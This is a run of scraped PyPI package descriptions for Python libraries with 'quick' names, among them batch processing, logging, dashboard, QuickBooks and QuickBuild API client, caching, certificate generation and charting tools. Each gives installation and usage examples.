This allows you to scale anyprocessorfunction that needs to be run over a large set of input data, enabling batch/parallel processing of the input with minimal setup and teardown.quick_batchGetting startedUsageScalingInstallationTheprocessor.pyfileWhy use quick_batchGetting startedAll you need to scale batch transformations withquick_batchis atransformation function(s) in aprocessor.pyfileDockerfilecontaining a container build appropriate to y our processoran optionalrequirements.txtfile containing required python modulesDocument paths to these objects as well as other parameters in aconfig.yamlconfig file of the form below.Underprocessoryou can either define adockerfile_pathto your Dockerfile or animage_nameto a pre-built image to be pulled.data:input_path:/path/to/your/input/dataoutput_path:/path/to/your/output/datalog_path:/path/to/your/log/filequeue:feed_rate:order_files:processor:dockerfile_path:/path/to/your/Dockerfile ORimage_name:requirements_path:/path/to/your/requirements.txtprocessor_path:/path/to/your/processor/processor.pynum_processors:quick_batchwill point yourprocessor.pyat theinput_pathdefined in thisconfig.yamland process the files listed in it in parallel at a scale given by your choice ofnum_processors.Output will be written to theoutput_pathspecified in the configuration file.You can see theexamplesdirectory for examples of valid configs, processors, requirements, and dockerfiles.UsageTo start processing with yourconfig.yamlusequick_batch'sconfigcommand at the terminal by typingquick_batchconfig/path/to/your/config.yamlThis will start the build and deploy process for processing your data as defined in yourconfig.yaml.ScalingUse thescalecommoand to manually scale the number of processors / containers running your processquick_batchscaleHereis an integer >= 1. For example, to scale to 3 parallel processors / containers:quick_batch scale 3InstallationTo install quick_batch, simply usepip:pipinstallquick-batchTheprocessor.pyfileCreate aprocessor.pyfile with the following basic pattern:import...defprocessor(todos):forfile_nameintodos.file_paths_to_process:# processing codeThetodosobject will carry infeed_ratenumber of file names to process in.file_paths_to_process.Note: the function nameprocessoris mandatory.Why use quick_batchquick_batch aims to bedead simple to use:versus standard cloud service batch transformation services that require significant configuration / service understandingultra fast setup:versus setup of heavier orchestration tools likeairflowormlflow, which may be a hinderance due to time / familiarity / organisational constraints100% portable:- use quick_batch on any machine, anywhereprocessor-invariant:quick_batch works with arbitrary processes, not just machine learning or deep learning tasks.transparent and open source:quick_batch uses Docker under the hood and only abstracts away the not-so-fun stuff - including instantiation, scaling, and teardown. you can still monitor your processing using familiar Docker command-line arguments (likedocker service ls,docker service logs, etc.)."} +{"package": "quickBayes", "pacakge-description": "This package provides code for a Bayesian workflow. The two options are model selection and grid search. This package replaces quasielasticbayes. 
An application of this package is to fit quasi-elastic neutron scattering data in Mantid (https://www.mantidproject.org)"} +{"package": "quickbe", "pacakge-description": "Quick back-endWhat is QuickbeQuickbe is a Python library that enables you to deliver quick back-end components.\nIf you are a technical founder or a developer, use this package to build everything you need to launch and grow high-quality SaaS application.\nEvery SaaS application needs these componentsMicro-servicesWeb-services or APIsWeb-hooks receiversCentral vaultWhy PythonIt has a strong community, it is fast to learn, it has lots of tools to process and analyze data ... and data is a major key for building a good app :-)Web serverDevelop your endpoint as functions with annotations for routing and validation.@endpoint(path='hello', validation={'name': {'type': 'string', 'required': True}})\ndef say_hello(session: HttpSession):\n name = session.get_parameter('name')\n if name is None:\n name = ''\n return f'Hello {name}'Run them using Flask or as AWS Lambda function without any changes to your code.Build in endpoints/health- Returns 200 if every thing is OK (e.g:{\"status\":\"OK\",\"timestamp\":\"2022-07-25 06:18:54.214674\"})//set_log_level/- Set log level//quickbe-server-info- Get verbose info on the server (endpoints and packages)//quickbe-server-status- Get server status (uptime, memory utilization, request per seconds and log info)//quickbe-server-environ- Get all environment variables keys and values"} +{"package": "quickbelog", "pacakge-description": "Quick using loggerThis small project purpose is to add nice and clean logs to your app.\nJust import thequickbelog.Logclass wherever you need and start using it.\nTo make debugging easier by default it will include the name of the source file and line number in order to understand what code line is responsible for the output.Usage:from quickbelog import Log\n\nLog.info(msg='This is an info message')\nLog.debug(msg='This is a debug message')\nLog.warning(msg='This is a warning message')\nLog.error(msg='This is an error message')\ntry:\n raise ValueError('Just for testing')\nexcept ValueError:\n quickbe.Log.exception('Something failed')Output2022-03-14 15:54:03,411 > INFO test_logger.py(17) method: test_basic_log_message This is an info message\n2022-03-14 15:54:03,411 > DEBUG test_logger.py(21) method: test_debug_message This is a debug message\n2022-03-14 15:54:03,411 > WARNING test_logger.py(29) method: test_warning_message This is a warning message\n2022-03-14 15:54:03,412 > ERROR test_logger.py(33) method: test_error_message This is an error message\n2022-03-14 15:54:03,412 > ERROR test_logger.py(13) method: test_exception_logging Something failed\nTraceback (most recent call last):\n File \".\\test_logger.py\", line 11, in test_exception_logging\n raise ValueError('Just for testing')\nValueError: Just for testingHave fun :-)"} +{"package": "quickbeserverless", "pacakge-description": "quickbeserveless"} +{"package": "quickbeutils", "pacakge-description": "Quick using loggerAll sorts of utilitiesSending emailsSending Slack messages and filesWork with environment variablesConvert time to human formatRetry mechanism"} +{"package": "quickbite", "pacakge-description": "QuickBite: Recipe GeneratorModern Data Structures - Fall 2023Columbia University QMSSHafsah T. ShaikAboutQuickBite is a Python-based command-line application that generates cooking recipes based on user-inputted ingredients. 
It aims to promote cooking with available resources, reduce food waste, and simplify meal planning by utilizing data from various recipe and nutritional databases.This project is the final project for the Modern Data Structures class at Columbia University for Fall 2023.FeaturesFetch and display recipes from a vast collection using the Spoonacular API.Gather and present nutritional data for ingredients using the Edamam API.Generate recipes based on user-provided ingredients and dietary preferences.Offer the ability to exclude certain ingredients from the recipe search.Provide summary statistics about the recipes such as calorie count and preparation time.InstallationTo install QuickBite, you will need Python 3.8 or later.From PyPIOnce QuickBite is available on PyPI, you can install it using pip:pipinstallquickbiteFor DevelopmentIf you wish to install QuickBite for development purposes, follow these steps:Clone the repository:gitclonehttps://github.com//QuickBite.gitNavigate to the project directory:cdQuickBiteInstall the package along with its dependencies:poetryinstallThis will create a virtual environment with all the necessary dependencies installed.UsageTo use QuickBite, run the following command in your terminal:quickbiteYou will be prompted to enter the ingredients you have on hand, separated by commas:Enter ingredients you have, separated by commas (e.g., eggs, flour, sugar):Next, you can specify any ingredients you wish to exclude from the recipe suggestions:Enter ingredients you want to exclude, separated by commas (e.g., nuts, dairy):QuickBite will then display a list of recipes that match your ingredients, and you can select one to see more details, including the recipe's nutritional information and a list of all needed ingredients.Here's an example of command usage:$ quickbite\nWelcome to the Recipe Generator!\n\nEnter ingredients you have, separated by commas (e.g., eggs, flour, sugar): chicken, rice\n\nEnter ingredients you want to exclude, separated by commas (e.g., nuts, dairy):\n\nSearching for recipes...\n\nAvailable recipes:\n1. Chicken and Rice Casserole\n2. Spicy Chicken Stir Fry\n3. Simple Chicken Biryani\n4. Chicken Fried Rice\n\nEnter the number of the recipe to get more information, or 'exit' to finish: 2\n\nFetching details for recipe: Spicy Chicken Stir Fry...\n\nNutritional Information:\nCalories: 300\nProtein: 25g\n...\n\nIngredients List:\n- Chicken breast: 2 pieces\n- Rice: 1 cup\n- Bell pepper: 1\n- ...\n\nWould you like to start over? 
(yes/no): noDevelopment SetupTo set up a development environment for QuickBite:Clone the repository:gitclonehttps://github.com//QuickBite.gitNavigate to the project directory:cdQuickBiteInstall dependencies using Poetry:poetryinstallActivate the virtual environment:poetryshellSet up environment variables:\nCopy.env.exampleto.envand populate it with your API keys.FunctionsThe application includes the following defined functions:search_recipes_by_ingredients: Search for recipes based on a list of ingredients.search_recipes_excluding_ingredients: Filter recipes by excluding certain ingredients.get_nutritional_data: Retrieve nutritional information for a given ingredient.get_recipe_details: Fetch detailed information about a specific recipe.get_user_ingredients: Interactively get ingredients from the user.get_user_exclusions: Interactively get ingredient exclusions from the user.display_recipes: Display a list of recipes to the user.print_ingredients_list: Print out a formatted list of ingredients.get_ingredients_for_recipe: Extract and format ingredients for a specific recipe.format_nutritional_data: Format and display nutritional data.Challenges Faced and SolutionsThroughout the development of QuickBite, several technical challenges were encountered:API Rate Limiting: Both Spoonacular and Edamam APIs have rate limits which initially hindered the ability to collect large amounts of data continuously. To overcome this, I implemented a caching system that stores API responses, thereby reducing the number of necessary calls for repeated data requests.Data Inconsistency: The data retrieved from the APIs had inconsistencies in formatting, especially with units of measurement for ingredients. I created a normalization function that standardizes the units and formats the ingredient data into a consistent structure.Error Handling: Various exceptions and errors such as timeouts and HTTP errors were frequent during API interaction. I utilized try-except blocks to handle these exceptions gracefully and ensure the application could continue running without crashing.Environment Management: Managing API keys securely while allowing the application to be used on different machines was a concern. I used environment variables to handle API keys, making the application more secure and portable.These challenges were met with a focus on robustness and user experience, ensuring that the final product was not only functional but also reliable and easy to use.ContributingContributions are welcome. Please open an issue to discuss your ideas or submit a Pull Request.LicenseQuickBite is open-sourced under the MIT License, which provides a permissive free software license that allows for reuse within proprietary software provided all copies of the licensed software include a copy of the MIT License terms and the copyright notice.For the full license text, see theLICENSEfile.AcknowledgementsThis project is submitted as a part of the final coursework for the Modern Data Structures class under the guidance of Dr. Thomas Brambor, Columbia University QMSS, Fall 2023.Data provided by:Spoonacular APIEdamam API"} +{"package": "quickboard", "pacakge-description": "QuickboardA simple Python package for creating quick, modular dashboardsOverviewQuickboard is a collection of Python classes and utilities for making scalable dashboards. 
Built on top ofDashandPlotly, Quickboard provides\nan assortment of tools and pre-made components to mix and match, achieving a balance between ease-of-use and\ncustomizability.The following example was made using Quickboard.The Quickboard package contains three subpackages of interest for developing dashboards:base - the core components used to make the backbone of the dashboard,plugins - highly customizable add-ons to augment your other components,(EXPERIMENTAL) textboxes - components for having dynamically updated text.More details on using these can be foundbelow.Install GuideTo install, simply runpip install quickboardin your virtual environment.UsageOnce you have some datasets you'd like to visualize and present with a dashboard, you can start making\nQuickboard components to achieve this purpose. Check out theComponent Galleryto see what\nyou can create with just a few lines of code.Once you have a few components you'd like to put together into a larger app, or to take advantage of using tab-level\nplugin interactions, you can use a few of the other Quickboard classes to achieve this. The general layout of a full\nQuickboard consists of:aQuickboardobject to hold everything together;a (n optional) list ofBaseTabobjects to organize visuals into tabs;aSidebarcalibrated to hold differentpluginsbased on the current tab.Within each tab, we havevariousContentGridobjects to display other components in a grid, with customizable column wrapping length;differentDynamicPanelobjects, materialized in the form of aPlotPanelorDataPanel, which house the\nprimary data displays, updatable via the sidebar plugins and other panel specificControlPluginobjects.Understanding how to compose and mix these components will allow for a huge variety in producible dashboards. For more\ninfo on how to use them, check out the docstrings (e.g.help(ContentGrid)) or see theGuided Example."} +{"package": "quickbolt", "pacakge-description": "QuickboltAsynchronously make and validate requests!This was forked fromapi-automation-tools.Table of contentsInstallationUsagePytestAsync requests with aiohttp or httpxAsync calls with grpcValidationsExamplesProject structureInstallation$pipinstallquickboltUsagePytestThe CorePytestBase loadsjsonfiles fromcredentialsanddatafolders during setup. Validations and reporting are performed during the teardown.Async requests with aiohttp or httpxMake single or batched style async requests using aiohttp or httpx. Each request method call will generate a csv containing useful data about the request(s). 
The usual request arguments of aiohttp and httpx are supported.There's a nifty function calledgenerate_batchthat'll intake valid (200 type) request information and return a list of corruptions for execution.fromquickbolt.clientsimportAioRequests,HttpxRequestsaiohttp_requests=AioRequests()httpx_requests=HttpxRequests()batch={'method':'get','headers':{...},'url':'...'}response=aiohttp_requests.request(batch)response=httpx_requests.request(batch)orbatch=[{'method':'get','headers':{...},'url':'...'},{...},...]responses=aiohttp_requests.request(batch)responses=httpx_requests.request(batch)orfromquickbolt.batch_generationimportgenerate_batchbatch=generate_batch(\"get\",...)responses=aiohttp_requests.request(batch)responses=httpx_requests.request(batch)Note: Both clients have an awaitable request method called async_request e.g.await aiohttp_requests.async_request(...)orawait httpx_requests.async_request(...).Note: You can indicate where the batch generator will start looking for path parameters by placing asemicolon (;)where the path parameters start (before a/) e.g.https://httpbin.org/get;/param/value.Async calls with grpcMake single or batched style async calls using grpc. Each call method call will generate a csv containing useful data about the call(s).Seeherefor a quick tutorial on the mechanics of making grpc calls.fromquickbolt.clientsimportAioGPRCfromtests.client.gprc.serversimporthelloworld_pb2,helloworld_pb2_grpcaio_grpc=AioGPRC()options={\"address\":\"localhost:50051\",# the address of the server\"stub\":helloworld_pb2_grpc.GreeterStub,# the stub class reference of the service\"method\":\"SayHello\",# the service method to call\"method_args\":helloworld_pb2.HelloRequest(name=\"Quickbolt\"),# the args the service method accepts}responses=awaitpytest.aio_grpc.call(options)Note: Generate batch is not supported for async grpc calls.ValidationsAfter eachrequest, a scrubbed copy of the csv history of the execution will be generated. This file (or the original) can be used to validate against executions over time. These files will have the same name as the running test, just with thecsvextenstion instead. Any mismatches can be raised as errors and are reported in a separate csv. Historical csv files to be used as reference can be stored in a validations folder at the root level.fromquickbolt.validationsimportValidations...requestsweremadeandcsvfilesweregenerated...validations=Validations()mismatches=awaitvalidations.validate_references(actual_refs={...})mismatches=>[{\"values\":[{\"key\":\"ACTUAL_CODE\",\"d1\":\"404\",\"d2\":\"999\"},...],\"keys\":[...],\"skipped_keys\":[...],\"actual_refs\":{...},\"expected_refs\":{...},\"unscrubbed_refs\":{...},},{...},]ExamplesAn example of a test -test_get.pyAn example of a base class showing a setup and teardown -some_pytest_base.pyAn example of the scrubbed csv report file generated from running the test -get_scrubbed.csvProject structureThis package requires the following base structure for the project..\n\u251c\u2500\u2500 credentials # Optional - credentials\n\u2502 \u2514\u2500\u2500 credentials.json # Optional - credentials as json\n\u251c\u2500\u2500 tests # Required - test files\n\u2502 \u251c\u2500\u2500 data # Optional - test data\n\u2502 \u2502 \u2514\u2500\u2500 data.json # Optional - test data as json\n\u2502 \u2514\u2500\u2500 test_some_request.py # Required - pytest test\n\u2514\u2500\u2500 validations # Optional - validation data\n \u2514\u2500\u2500 some_request.json # Optional - validation data as json. 
the validation files \n directory structure must match the structure of the tests in the tests folder."} +{"package": "quickbooks-desktop", "pacakge-description": "quickbooks_desktopA Python 3 library for QuickBooks Desktop API.The purpose of the project is to make QuickBooksDesktop more accessible in Python. This libraryuses QBXML instead of QBFC.Python 32 Bit vs. 64 BitUntil 2022, QuickBooks was a 32 bit program. Becauseof this, you will need to use a 32 bit version of Python.In 2022 QuickBooks did upgrade to 64 bit so if you're usingQuickBooks version 2022 (or 22.0 for Enterprise) thena 64 bit version of Python may work.InstructionsThis package will handle all the complexities of dealing withSession Manager.Getting HelpFor a look at xml code you can go to QuickBooksOnscreen ReferenceDiscussion and DevelopmentMost development discussions take place on GitHub in this repo."} +{"package": "quickbooks-pinecone", "pacakge-description": "python-quickbooksA Python 3 library for accessing the Quickbooks API. Fork ofpython-quickbooksThese instructions were written for a Django application. Make sure to\nchange it to whatever framework/method you\u2019re using.\nYou can find additional examples of usage inIntegration tests folder.For information about contributing, see theContributing Page.QuickBooks OAuthThis library requiresintuit-oauth.\nFollow theOAuth 2.0 Guidefor installation and to get connected to QuickBooks API.Accessing the APISet up an AuthClient passing in yourCLIENT_IDandCLIENT_SECRET.fromintuitlib.clientimportAuthClientauth_client=AuthClient(client_id='CLIENT_ID',client_secret='CLIENT_SECRET',environment='sandbox',redirect_uri='http://localhost:8000/callback',)Then create a QuickBooks client object passing in the AuthClient, refresh token, and company id:fromquickbooksimportQuickBooksclient=QuickBooks(auth_client=auth_client,refresh_token='REFRESH_TOKEN',company_id='COMPANY_ID',)If you need to access a minor version (SeeMinor versionsfor\ndetails) pass in minorversion when setting up the client:client=QuickBooks(auth_client=auth_client,refresh_token='REFRESH_TOKEN',company_id='COMPANY_ID',minorversion=4)Object OperationsList of objects:fromquickbooks.objects.customerimportCustomercustomers=Customer.all(qb=client)Note:The maximum number of entities that can be returned in a\nresponse is 1000. If the result size is not specified, the default\nnumber is 100. 
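A possible paging pattern, sketched only from the filter() call and the start_position/max_results parameters documented in the paging examples that follow; the loop, the page-size variable, and the stop condition are illustrative assumptions rather than part of the library's documented API, and client is assumed to be the QuickBooks client created above:

from quickbooks.objects.customer import Customer

position = 1
page_size = 100   # matches the default page size mentioned above
customers = []
while True:
    # request one page at a time; start_position is 1-based in the documented examples
    page = Customer.filter(Active=True, start_position=position, max_results=page_size, qb=client)
    customers.extend(page)
    if len(page) < page_size:   # a short page means there is nothing left to fetch
        break
    position += page_size

Fetching in fixed-size pages like this also keeps each response below the 1000-entity cap noted above.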
(SeeIntuit developer guidefor details)Filtered list of objects:customers=Customer.filter(Active=True,FamilyName=\"Smith\",qb=client)Filtered list of objects with ordering:# Get customer invoices ordered by TxnDateinvoices=Invoice.filter(CustomerRef='100',order_by='TxnDate',qb=client)# Same, but in reverse orderinvoices=Invoice.filter(CustomerRef='100',order_by='TxnDate DESC',qb=client)# Order customers by FamilyName then by GivenNamecustomers=Customer.all(order_by='FamilyName, GivenName',qb=client)Filtered list of objects with paging:customers=Customer.filter(start_position=1,max_results=25,Active=True,FamilyName=\"Smith\",qb=client)List Filtered by values in list:customer_names=['Customer1','Customer2','Customer3']customers=Customer.choose(customer_names,field=\"DisplayName\",qb=client)List with custom Where Clause (do not include the\"WHERE\"):customers=Customer.where(\"Active = True AND CompanyName LIKE 'S%'\",qb=client)List with custom Where and orderingcustomers=Customer.where(\"Active = True AND CompanyName LIKE 'S%'\",order_by='DisplayName',qb=client)List with custom Where Clause and paging:customers=Customer.where(\"CompanyName LIKE 'S%'\",start_position=1,max_results=25,qb=client)Filtering a list with a custom query (SeeIntuit developer guidefor\nsupported SQL statements):customers=Customer.query(\"SELECT * FROM Customer WHERE Active = True\",qb=client)Filtering a list with a custom query with paging:customers=Customer.query(\"SELECT * FROM Customer WHERE Active = True STARTPOSITION 1 MAXRESULTS 25\",qb=client)Get record count (do not include the\"WHERE\"):customer_count=Customer.count(\"Active = True AND CompanyName LIKE 'S%'\",qb=client)Get single object by Id and update:customer=Customer.get(1,qb=client)customer.CompanyName=\"New Test Company Name\"customer.save(qb=client)Create new object:customer=Customer()customer.CompanyName=\"Test Company\"customer.save(qb=client)Batch OperationsThe batch operation enables an application to perform multiple\noperations in a single request (SeeIntuit Batch Operations Guidefor\nfull details).Batch create a list of objects:fromquickbooks.batchimportbatch_createcustomer1=Customer()customer1.CompanyName=\"Test Company 1\"customer2=Customer()customer2.CompanyName=\"Test Company 2\"customers=[customer1,customer2]results=batch_create(customers,qb=client)Batch update a list of objects:fromquickbooks.batchimportbatch_updatecustomers=Customer.filter(Active=True)# Update customer recordsresults=batch_update(customers,qb=client)Batch delete a list of objects:fromquickbooks.batchimportbatch_deletecustomers=Customer.filter(Active=False)results=batch_delete(customers,qb=client)Review results for batch operation:# successes is a list of objects that were successfully updatedforobjinresults.successes:print(\"Updated \"+obj.DisplayName)# faults contains list of failed operations and associated errorsforfaultinresults.faults:print(\"Operation failed on \"+fault.original_object.DisplayName)forerrorinfault.Error:print(\"Error \"+error.Message)Change Data CaptureChange Data Capture returns a list of objects that have changed since a given time\n(seeChange data capturefor more details):fromquickbooks.cdcimportchange_data_capturefromquickbooks.objectsimportInvoicecdc_response=change_data_capture([Invoice],\"2017-01-01T00:00:00\",qb=client)forinvoiceincdc_response.Invoice:pass# Do something with the invoiceQuerying muliple entity types at the same 
time:fromquickbooks.objectsimportInvoice,Customercdc_response=change_data_capture([Invoice,Customer],\"2017-01-01T00:00:00\",qb=client)If you use adatetimeobject for the timestamp, it is automatically converted to a string:fromdatetimeimportdatetimecdc_response=change_data_capture([Invoice,Customer],datetime(2017,1,1,0,0,0),qb=client)AttachmentsSeeAttachable documentationfor list of valid file types, file size limits and other restrictions.Attaching a note to a customer:attachment=Attachable()attachable_ref=AttachableRef()attachable_ref.EntityRef=customer.to_ref()attachment.AttachableRef.append(attachable_ref)attachment.Note='This is a note'attachment.save(qb=client)Attaching a file to customer:attachment=Attachable()attachable_ref=AttachableRef()attachable_ref.EntityRef=customer.to_ref()attachment.AttachableRef.append(attachable_ref)attachment.FileName='Filename'attachment._FilePath='/folder/filename'# full path to fileattachment.ContentType='application/pdf'attachment.save(qb=client)Other operationsVoid an invoice:invoice=Invoice()invoice.Id=7invoice.void(qb=client)If your consumer_key never changes you can enable the client to stay running:QuickBooks.enable_global()You can disable the global client like so:QuickBooks.disable_global()Working with JSON dataAll objects includeto_jsonandfrom_jsonmethods.Converting an object to JSON data:account=Account.get(1,qb=client)json_data=account.to_json()Loading JSON data into a quickbooks object:account=Account()account.from_json({\"AccountType\":\"Accounts Receivable\",\"Name\":\"MyJobs\"})account.save(qb=client)Date formattingWhen setting date or datetime fields, Quickbooks requires a specific format.\nFormating helpers are available in helpers.py. Example usage:date_string=qb_date_format(date(2016,7,22))date_time_string=qb_datetime_format(datetime(2016,7,22,10,35,00))date_time_with_utc_string=qb_datetime_utc_offset_format(datetime(2016,7,22,10,35,00),'-06:00')Exception HandlingThe QuickbooksException object contains additionalQBO error codeinformation.fromquickbooks.exceptionsimportQuickbooksExceptiontry:pass# perform a Quickbooks operationexceptQuickbooksExceptionase:e.message# contains the error message returned from QBOe.error_code# contains thee.detail# contains additional information when availableNote:Objects and object property names match their Quickbooks\ncounterparts and do not follow PEP8.Note:This is a work-in-progress made public to help other\ndevelopers access the QuickBooks API. 
Built for a Django project."} +{"package": "quickbooks-py", "pacakge-description": "Python Library for interfacing with Quickbooks Accounting API v3 found athttps://developer.intuit.com/docs/api/accountingFree software: ISC licenseHistory0.1.3 (2015-09-27)First release on PyPI.0.1.4 (2015-10-15)Updated requests library0.2.0 (2016-01-23)Added an api to disconnect from quickbooks0.2.1 (2016-01-23)Making Resource name case insensitive0.2.2 (2016-02-19)Bugfix in parsing query response when the response is empty"} +{"package": "quickbooks-python", "pacakge-description": "UNKNOWN"} +{"package": "quickbuild", "pacakge-description": "Package supports sync and async syntax with same code base.fromquickbuildimportAsyncQBClient,QBClientDocumentationPackage Read the DocsOfficial REST API documentationAvailable REST API ClientsInstallationpip3installquickbuildExamplesGet server version:fromquickbuildimportQBClientclient=QBClient('https://server','user','password')version=client.system.get_version()print(version)Get server version in async way (be carefulAsyncQBClientmust be called inside async function):importasynciofromquickbuildimportAsyncQBClientasyncdefmain():client=AsyncQBClient('https://server','user','password')version=awaitclient.system.get_version()print(version)awaitclient.close()asyncio.run(main())Stop build:fromquickbuildimportQBClientclient=QBClient('https://server','user','password')client.builds.stop(123)Update credentials handler:importasyncioimportaiohttpfromquickbuildimportAsyncQBClientasyncdefget_credentials():asyncwithaiohttp.ClientSession()assession:asyncwithsession.get('...')asresp:response=awaitresp.json()returnresponse['user'],response['password']asyncdefmain():client=AsyncQBClient('http://server','user','password',auth_update_callback=get_credentials)# let's suppose credentials are valid nowprint(awaitclient.builds.get_status(12345))# now, after some time, password of user somehow changed, so our callback# will be called, new credentials will be using for retry and future here# we get also correct build info instead of QBUnauthorizedError exceptionprint(awaitclient.builds.get_status(12345))awaitclient.close()asyncio.run(main())Content typeBy default QuickBuild returns XML content, but starting from 10 version it also\nhas native support of JSON content, usually it\u2019s much more convenient to use\nnative Python types (parsed XML) instead of pure XML string.So, that is why three types of content were indtoduced, this type and behavior\ncan be set globally for client instances, and can be rewritten for some methods.PARSE (using by default)GET: parse XML to native Python types.POST: pure XML string.XMLGET: return native XML without any transformations.POST: pure XML string.JSON (QuickBuild 10+)GET: parsed JSON string.POST: dumps object to JSON string.DevelopmentIt\u2019s possible to run QuickBuild community edition locally using docker:Build locally:dockerbuild.-fdocker/QB10.Dockerfile-tquickbuild:10dockerrun--restartalways--nameqb10-d-p8810:8810quickbuild:10Or run prepared image:dockerrun--restartalways--nameqb10-d-p8810:8810pbelskiy/quickbuild:10Then openhttp://localhost:8810/TestingPrerequisites:toxThen just run tox, all dependencies and checks will run automaticallytoxContributingFeel free for any contributions."} +{"package": "quickcache", "pacakge-description": "No description available on PyPI."} +{"package": "quick-cache", "pacakge-description": "A quick and easy to use python caching system.You can installquick_cacheviapipinstall--userquick_cacheand import it in python 
using:fromquick_cacheimportQuickCacheCreate the cache object as follows:defmsg(message,*args,**kwargs):print(message.format(*args,**kwargs),file=sys.stderr)cache=QuickCache(base_file,quota=500,ram_quota=100,warnings=msg)wherebase_fileis an optional file whosecontentinvalidates the\ncache (ie., when the content of the file changes the cache is\ninvalidated; for large files it might be desirable to use themtimein\nthe cache object below) andmsgis an optional formatting function\nthat prints warnings (by default it\u2019sNonewhich doesn\u2019t print\nanything; warnings are emitted when the actual computation is faster\nthan reading the results from the cache or if other exceptional\nsituations occur).quotaandram_quotaare optional maximal\ncache sizes, both in RAM and on disk, in MB.The caching functionality can then be used via:withcache.get_hnd({# object identifying the task to cache# can be any combination of keys and values\"param_a\":5,\"input_file_c\":os.path.getmtime(input_file_c),# for file change time...})ashnd:ifnothnd.has():res=hnd.write(do_compute())# compute your result hereelse:res=hnd.read()# your result is in resThe cache object used for creating the handle uniquely defines the task.\nThe object should contain all parameters of the task and the task\ncomputation itself should be deterministic."} +{"package": "quickcal", "pacakge-description": "QUICK CALCULATIONThis library will help to calculate numbers quickly.How to install?'''\npip install quickcal\n'''initializing package'''\nfrom quickcal import QuickCalnum_1 = 16\nnum_2 = 8cal = QuickCal(num_1, num_2)\n'''for addition'''\ncal.addition()\n'''for substraction'''\ncal.substraction()\n'''for multiplication'''\ncal.multiplication()\n'''for division'''\ncal.division()\n'''"} +{"package": "quickcalc", "pacakge-description": "Quick CalcThis package will help you Calculate Numbers Quickly.How to Install it?On Windowspip install quickcalcOn Linux:sudo pip3 install quickcalcHow to use it?Initializing Packagefrom quickcalc import QuickCalc\n\nnum_1 = 8\nnum_2 = 1\n\ncalc = QuickCalc(num_1, num_2)Adding Numberscalc.addition()Substracting Numberscalc.substraction()Multiplying Numberscalc.multiplication()Dividing Numberscalc.division()"} +{"package": "quickcalculator", "pacakge-description": "No description available on PyPI."} +{"package": "quick-cd", "pacakge-description": "Quick cdQuick cd is little tool allowing you to save any directory under a label, so you can quickly cd into it with out giving whole path.Instalationpip install quick-cdUsageTo save current location under label \"my_location\" useqcd -c my_locationYou can also, specify relative or absolute path, to save it instead of current directory.qcd -c my_location ../different_dirTo cd into saved location, simply give label without any additional argumentsqcd my_locationTo remove previously saved location useqcd -d labelTo list all saved locationsqcd -l"} +{"package": "quickcerts", "pacakge-description": "quickcertsQuick and easy X.509 certificate generator for SSL/TLS utilizing local PKI:heart: :heart: :heart:You can say thanks to the author by donations to these wallets:ETH:0xB71250010e8beC90C5f9ddF408251eBA9dD7320eBTC:Legacy:1N89PRvG1CSsUk9sxKwBwudN6TjTPQ1N8aSegwit:bc1qc0hcyxc000qf0ketv4r44ld7dlgmmu73rtlntwFeaturesEasy to use.Genarates both client and server certificates.Produces certificates with proper attributes (Key Usage, Extended Key Usage, Authority Key Identifier, Subject Key Identifier and so on).Supports certificates with multiple domain names (SAN, 
SubjectAlternativeName).Supports wildcard certificates.Generates PKCS12 (.pfx, .p12) as wellRequirementsPython 3.4+cryptography 1.6+InstallationFrom sourceRun this command within source directory:pip3install.From PyPIpip3installquickcertsSnap StoresudosnapinstallquickcertsDockerFor deployment with Docker see \"Docker\" section below.Usage examplequickcerts-D*.example.comexample.com-Dwww.example2.comexample2.commx.example2.com-C\"John Doe\"-C\"Jane Doe\"quickcerts-Dlocalhost127.0.0.1These commands will produce following files in current directory:CA certificate and keyTwo server certificates having multiple DNS names or IP addresses in SubjectAlternativeName fields and keys for that certificates.Two client certificates for CN=\"John Doe\" and CN=\"Jane Doe\" (and keys for them).Consequent invokations will reuse created CA.DockerAlso you may run this application with Docker:dockerrun-it--rm-v\"$(pwd)/certs:/certs\"\\yarmak/quickcerts-Dserver-Cclient1-Cclient2-Cclient3In this example CA and certificates will be created in./certsdirectory.Synopsis$ quickcerts --help\nusage: quickcerts [-h] [-o OUTPUT_DIR] [-k KEY_SIZE] [--kdf-rounds KDF_ROUNDS]\n [-D DOMAINS [DOMAINS ...]] [-C CLIENT] [-P PASSWORD]\n\nGenerate RSA certificates signed by common self-signed CA\n\noptions:\n -h, --help show this help message and exit\n -o OUTPUT_DIR, --output-dir OUTPUT_DIR\n location of certificates output (default: .)\n -k KEY_SIZE, --key-size KEY_SIZE\n RSA key size used for all certificates (default: 2048)\n --kdf-rounds KDF_ROUNDS\n number of KDF rounds (default: 50000)\n -D DOMAINS [DOMAINS ...], --domains DOMAINS [DOMAINS ...]\n Generate server certificate which covers following\n domains or IP addresses delimited by spaces. First one\n will be set as CN. Option can be used multiple times.\n (default: None)\n -C CLIENT, --client CLIENT\n Generate client certificate with following name.\n (default: None)\n -P PASSWORD, --password PASSWORD\n password for newly generated .pfx files (default:\n password)"} +{"package": "quickchart", "pacakge-description": "QuickChart Python library=========QuickChart is a lightweight library for drawing graphs and tables using just (http://www.pythonware.com/products/pil/ \"PIL\")."} +{"package": "quickchart-io", "pacakge-description": "quickchart-pythonA Python client for thequickchart.ioimage charts web service.InstallationUse thequickchart.pylibrary in this project, or install throughpip:pip install quickchart.ioUsageThis library provides aQuickChartclass. Import and instantiate it. 
Then set properties on it and specify aChart.jsconfig:fromquickchartimportQuickChartqc=QuickChart()qc.width=500qc.height=300qc.config={\"type\":\"bar\",\"data\":{\"labels\":[\"Hello world\",\"Test\"],\"datasets\":[{\"label\":\"Foo\",\"data\":[1,2]}]}}Useget_url()on your quickchart object to get the encoded URL that renders your chart:print(qc.get_url())# https://quickchart.io/chart?c=%7B%22chart%22%3A+%7B%22type%22%3A+%22bar%22%2C+%22data%22%3A+%7B%22labels%22%3A+%5B%22Hello+world%22%2C+%22Test%22%5D%2C+%22datasets%22%3A+%5B%7B%22label%22%3A+%22Foo%22%2C+%22data%22%3A+%5B1%2C+2%5D%7D%5D%7D%7D%7D&w=600&h=300&bkg=%23ffffff&devicePixelRatio=2.0&f=pngIf you have a long or complicated chart, useget_short_url()to get a fixed-length URL using the quickchart.io web service (note that these URLs only persist for a short time unless you have a subscription):print(qc.get_short_url())# https://quickchart.io/chart/render/f-a1d3e804-dfea-442c-88b0-9801b9808401The URLs will render an image of a chart:Using Javascript functions in your chartChart.js sometimes relies on Javascript functions (e.g. for formatting tick labels). There are a couple approaches:Build chart configuration as a string instead of a Python object. Seeexamples/simple_example_with_function.py.Build chart configuration as a Python object and include a placeholder string for the Javascript function. Then, 